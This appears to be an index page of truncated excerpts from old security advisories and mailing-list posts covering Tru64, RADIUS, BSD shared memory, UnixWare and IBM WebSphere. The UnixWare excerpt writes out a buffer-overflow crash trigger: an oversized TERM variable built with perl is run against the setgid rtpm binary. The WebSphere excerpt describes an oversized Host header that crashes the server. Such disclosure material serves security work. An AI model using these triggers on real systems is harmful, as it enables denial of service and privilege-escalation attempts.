Compaq tru64 setuids /usr/bin/at and /usr/dt/bin/mailcv

Heres some the results of my latenight audit on Tru64. Its too late for me to mess with Compaqs web site to get the security contact I am tired and don't care or something. If someone has TRU64 gdb binaries I would love them... its too late for me to be playing with the Tru64 ladebug also... get ...

Re: More problems with RADIUS (protocol and implementations)

I note that the original message didn't cite my short message to Bugtraq about security issues with RADIUS: http://cert.uni-stuttgart.de/archive/bugtraq/2000/12/msg00332.html Some points in that message were also covered by Joshua, he added a number of good points, and missed a few others...

CVE-1999-1518

Operating systems with shared memory implementations based on BSD 4.4 code allow a user to conduct a denial of service and bypass memory limits e.g., as specified with rlimits using mmap or shmget to allocate memory and cause page faults...

Unixware 7.1.1 rtpm

$ uname -a UnixWare paris 5 7.1.1 i386 x86at SCO UNIXSVR5 this is a two node NSC $ id uid=101fixxxer gid=1other $ ls -al /usr/sbin/rtpm -r-xr-sr-x 1 bin sys 288324 Mar 22 22:35 /usr/sbin/rtpm $ export TERM=perl -e 'printf "B"x4800' $ rtpm Memory fault $ bash Memory faultcoredump $ vi Memory...

IBM Websphere Application Server 3.0.2 Server Plugin - Denial of Service

IBM Websphere Application Server 3.0.2 Server Plugin - Denial of Service source: https://www.securityfocus.com/bid/1691/info Large amounts of data ie 1092+ characters in the Host: request header may cause the web server process to fault on signal 11 SIGSEGV or signal 10 SIGBUS. GET /servletsnoop...

CVE-1999-1518

Operating systems with shared memory implementations based on BSD 4.4 code allow a user to conduct a denial of service and bypass memory limits e.g., as specified with rlimits using mmap or shmget to allocate memory and cause page faults...